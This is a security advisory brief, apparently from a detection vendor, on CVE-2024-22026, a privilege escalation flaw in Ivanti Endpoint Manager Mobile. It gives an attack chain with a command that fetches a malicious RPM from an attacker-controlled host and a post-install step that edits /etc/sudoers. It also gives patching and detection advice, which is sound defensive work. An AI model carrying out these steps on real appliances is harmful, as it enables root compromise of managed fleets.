Local Privilege Escalation in Ivanti Endpoint Manager Mobile (CVE-2024-22026)
A local privilege escalation vulnerability in Ivanti EPMM, tracked as CVE-2024-22026, allows an authenticated local attacker to achieve root access by installing unsigned RPM packages via the CLI 'install rpm url' command.
CVE search metadata
CVE search record: CVE-2024-22026. Severity: medium. CVSS: 6.7. EPSS: 1.10%. KEV: no. Product: Endpoint Manager Mobile (< 12.1.0.0, < 12.0.0.0, < 11.12.0.1). Brief: Local Privilege Escalation in Ivanti Endpoint Manager Mobile (CVE-2024-22026). Brief link: https://feed.craftedsignal.io/briefs/2026-10-ivanti-epmm-lpe/
CVE-2024-22026 is a local privilege escalation vulnerability affecting Ivanti Endpoint Manager Mobile (formerly MobileIron Core). The flaw resides in the CLI utility 'install rpm url', which fails to validate the authenticity or origin of RPM packages before installation. An attacker with existing low-privileged access to the system can point this utility to a remote, attacker-controlled repository containing a malicious RPM package. Upon execution, the utility invokes the native 'rpm' binary with root privileges to install the package. Because there is no signature verification or URL filtering, the system executes arbitrary scripts contained within the package's pre-install and post-install hooks, leading to full system compromise. The vulnerability is addressed in Ivanti EPMM versions 12.1.0.0, 12.0.0.0, and 11.12.0.1.
Attack Chain
- Attacker gains initial access to the Ivanti EPMM system as a low-privileged user via compromised credentials or other entry vectors.
- Attacker prepares a malicious RPM package using tools such as 'fpm', embedding custom scripts in 'preinstall.sh' and 'postinstall.sh'.
- Attacker hosts the malicious RPM package on an external web server accessible by the target appliance.
- Attacker executes the CLI command 'install rpm url http://<attacker_IP>/<malicious>.rpm' within the Ivanti console.
- The application triggers the internal process to download the package from the provided URL.
- The system executes '/bin/rpm -Uvh *.rpm' with root privileges to perform the installation.
- The embedded 'postinstall.sh' script executes under the root context, creating a new user and modifying '/etc/sudoers' to grant persistent root access.
Impact
Successful exploitation results in full root-level compromise of the Ivanti EPMM appliance. Attackers can gain complete control over the device management infrastructure, potentially allowing them to bypass mobile security policies, exfiltrate sensitive configuration data, or push malicious profiles/applications to managed endpoints across the organization.
Recommendation
- Upgrade all Ivanti Endpoint Manager Mobile instances to version 12.1.0.0, 12.0.0.0, or 11.12.0.1 immediately to patch CVE-2024-22026.
- Implement strict network egress filtering on management appliances to prevent unauthorized outbound connections to untrusted external repositories or web servers.
- Deploy the Sigma rules below to detect unauthorized usage of the 'install rpm' CLI command or execution of rpm installation processes by non-administrative users.
- Review system audit logs for unauthorized user creation or modifications to the /etc/sudoers file.
Immediate actions
Patch Ivanti EPMM to versions 12.1.0.0, 12.0.0.0, or 11.12.0.1
Threat Hunt
Search for logs containing 'install rpm url' in command history
Data: Shell history or auditd process logs
Mitigations
Egress filtering for management interfaces
CVE-2024-22026
Detection coverage 1
Detect CVE-2024-22026 Exploitation - RPM Installation via CLI
highDetects usage of the 'install rpm url' command followed by execution of the rpm utility, a signature of CVE-2024-22026 exploitation.
Detection queries are available on the platform. Get full rules →